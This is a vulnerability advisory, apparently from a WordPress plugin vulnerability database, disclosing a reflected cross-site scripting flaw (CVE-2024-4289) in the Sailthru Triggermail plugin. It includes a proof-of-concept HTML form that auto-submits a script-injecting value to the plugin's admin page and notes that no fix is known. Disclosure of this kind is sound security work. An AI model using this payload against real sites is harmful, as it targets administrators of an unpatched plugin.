Sailthru Triggermail <= 1.1 – Reflected XSS | CVE 2024-4289 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=sailthru&action=blast" method="post">
        <input type="hidden" name="blast_name" value='"><script>alert(23)</script>' />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

sailthru-triggermail

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

072785de-0ce5-42a4-a3fd-4eb1d1a2f1be

Timeline

Publicly Published

2024-04-30 (about 1 year ago)

Added

2024-04-30 (about 1 year ago)

Last Updated

2024-04-30 (about 1 year ago)

Other

Published

Title

Published

2019-09-08

Title

Reality < 2.4.0 - Multiple Persistent XSS

Published

2025-03-05

Title

Greek Multi Tool < 2.3.2 - Unauthenticated Stored XSS

Published

2024-11-08

Title

WP Responsive Video <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-20

Title

Mini Course Generator | Embed mini-courses and interactive content < 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2011-09-27

Title

Pixiv Custom < 2.1.6 - XSS